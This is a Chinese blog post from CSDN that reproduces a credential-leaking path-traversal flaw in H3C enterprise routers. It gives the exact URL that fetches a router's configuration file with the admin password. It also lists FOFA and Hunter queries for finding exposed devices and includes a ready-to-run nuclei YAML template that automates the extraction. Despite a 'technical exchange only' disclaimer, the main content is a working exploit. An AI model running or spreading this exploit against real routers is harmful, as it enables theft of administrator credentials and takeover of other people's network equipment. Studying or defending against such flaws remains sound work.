(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)

已于 2024-05-22 18:33:36 修改
阅读量464 收藏 1
点赞数 13
分类专栏: 漏洞复现 文章标签: 安全
于 2024-05-22 16:43:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nglj9527/article/details/139123242
版权

(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码

2、资产指纹

fofa:app=“H3C-Ent-Router”
hunter:app.name=“H3C Router Management”

3、漏洞复现

访问路由器web页面,获取页面title中的路由器型号,以下图为例,路由器型号为ER8300G2。在这里插入图片描述
http://ip//userLogin.asp/…/actionpolicy_status/…/型号.cfg依据路由器型号拼接url:http://ip//userLogin.asp/…/actionpolicy_status/…/ER8300G2.cfg使用burpsuite发送请求,获得管理员密码等敏感信息。在这里插入图片描述

4、nuclei yaml文件

id: h3cinfor

info:
  name: h3cinfor
  author: xxx
  severity: critical
  description: 华三路由器存在敏感信息泄露漏洞


http:
  - raw:
    - |
      GET /userLogin.asp HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: none
      Sec-Fetch-User: ?1
      Priority: u=1
      Te: trailers
      Connection: close
      
    - |
      GET /userLogin.asp/../actionpolicy_status/../{{id}}.cfg HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      Priority: u=1
    
    extractors:
      - type: regex
        name: id
        group: 1
        regex: 
         - "<title>(.*?)系统管理</title>"
        internal: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2==200 && (contains_all(body_2,"vtypasswd"))'
nglj9527
关注
  • 13
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
广州安*通信技术有限公司secnet安网智能AC管理系统信息泄露漏洞复现 CNVD-2022-86158
afei001
09-15 277
广州安*通信技术有限公司(简称“*网通信”)是一家专注于网络通信设备的研发、生产、销售及服务,并为用户提供网络安全路由器、交换机、防火墙、无线AP覆盖等网络产品和业务解决方案的服务商。 secnet安网智能AC管理系统存在敏感信息泄露漏洞,攻击者可利用该漏洞登录系统获取敏感信息
漏洞复现H3C 路由器多系列信息泄露漏洞
晚风不及你
02-19 1740
H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。
h3c多系列路由器存在任意用户登录漏洞
m0_49025459的博客
08-28 2752
也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。密码就在vtypasswd之后,账户一般都是admin。根据根据系统名修改payload。发送请求包,获取管理员账号密码
phpipam开源IP地址管理系未授权XSS漏洞复现(CVE-2017-6481)
afei001
02-10 499
phpIPAM是一个开源的web IP地址管理应用程序。它的目标是提供简单的IP地址管理应用程序。phpipam存在多个未授权反射型跨站脚本攻击(XSS)漏洞,攻击者可利用该漏洞在JavaScript上下文中执行恶意代码。
金蝶*星空管理中心任意文件读取漏洞复现 CNVD-2021-86835
afei001
09-17 218
金蝶*星空管理中心是金*软件(中国)有限公司基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。 金蝶*星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞下载服务器上的任意文件,存在任意文件下载漏洞,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息
绿某科技集团股份有限公司UTS统一威胁探针信息泄露漏洞复现 CNVD-2022-50360
afei001
10-13 678
北京神州绿某科技有限公司是国内安全厂商,旗下的绿盟综合威胁探针 UTS 搭载IDS和WAF双检测引擎系统,结合威胁情报、恶意文件检测、DDoS检测、Webshell检测和异常行为检测等手段能快速检测传统威胁和高级威胁。 北京神州绿某科技有限公司UTS综合威胁探针存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息
浙江某华智能停车综合管理系统未授权访问漏洞复现 CNVD-C-2023-517991
afei001
10-11 272
浙江某华针对智能停车系统,拥有完善的研发、测试、生产、销售、售后流程,云集了一批富有行业经验的专业人才和工程技术人员。在多年从事野外全天候环境下的交通控制技术研究的基础上,开发了整合型感应式智能停车管理系统,具有技术先进、可靠性强、征稽管理功能强的特点,为客户提供业内最为完善的出入口控制管理设备和系统解决方案。浙江大华智能停车综合管理系统存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器权限。
某蝶EAS(Enterprise Application Suite)平台myUploadFile接口任意文件上传漏洞复现 CNVD-2023-57598
afei001
10-17 522
某蝶EAS(Enterprise Application Suite)是金某集团开发的一套企业级应用软件解决方案。它是一款集成化的企业管理软件,旨在帮助企业实现业务流程的数字化、自动化和优化。金蝶EAS提供了多个功能模块,涵盖了企业的各个方面,包括财务管理、人力资源管理、供应链管理、生产制造管理、销售与客户关系管理、项目管理等。这些模块可以根据企业的需求进行灵活的配置和定制,以满足不同行业和规模企业的管理需求。 某蝶EAS平台myUploadFile接口存在任意文件上传漏洞,攻击者可利用该
gmr.zip_NMR_Nuclei_The Work_gmr
07-14
GMR returns the gyromagnetic ratio and other NMR properties for various nuclei as well as the electron. Besides the function format, the command format will work as well, e.g. "gmr Na23 hzpt 3.0
nuclei:Nuclei是基于模板的可配置目标漏洞扫描的快速工具,具有大量可扩展性和易用性
03-19
基于简单的基于YAML的DSL的快速且可自定义的漏洞扫描程序。••••••• Nuclei用于基于模板发送跨目标的请求,从而导致零误报并提供对大量主机的快速扫描。 Nuclei提供扫描各种协议的功能,包括TCP,DNS,HTTP,...
Nuclei微控制器软件接口标准开发仓库_C语言_代码_相关文件_下载
07-07
Nuclei微控制器软件接口标准 (NMSIS)是一个独立于供应商的硬件抽象层,适用于基于 Nuclei 处理器的微控制器。 NMSIS定义了通用工具接口并支持一致的设备支持。它为处理器和外围设备提供了简单的软件接口,简化了...
nuclei对上传文件内容相关控制
01-26
nuclei对上传文件内容相关控制
3.Nuclei_N200系列快速应用手册1
08-04
背景知识——N200系列内核配套SOC193.1.N200 系列内核配套 SOC 框图 193.2.N200 系列内核配套 SOC 储存资源 193.3.N20
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1428
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 492
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 958
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
安鸾学院靶场——安全基础
qq_55202378的博客
06-13 1080
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
NTFS安全权限
2302_80097039的博客
06-12 685
NTFS权限是基于。
nuclei yaml
08-16
关于nucleiyaml的问题,根据引用和引用中的内容,nuclei是一个用于执行网络安全扫描的工具,可以通过命令行来使用。而yaml则是一种用于描述数据序列化格式的语言。 在引用中,展示了一个使用nuclei的命令行示例。其中,使用了参数来指定待扫描的目标URL、指定扫描的标签、指定扫描的严重程度、指定扫描的作者,并将扫描结果输出到result.txt文件中。 而在引用中,展示了一个使用nuclei进行调试扫描的命令行示例。其中,使用了参数来指定待扫描的目标URL和使用的模板文件(使用了yaml格式的模板文件)。 综上所述,nuclei是一个可以通过命令行使用的网络安全扫描工具,而yaml则是用于描述数据序列化格式的语言,可以用来编写nuclei的模板文件。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [POC模拟攻击利器 —— Nuclei入门(一)](https://blog.csdn.net/liwenxiang629/article/details/125995096)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [Nuclei——一款基于YAML语法模板的快速漏洞扫描工具](https://blog.csdn.net/asaotomo/article/details/122395708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值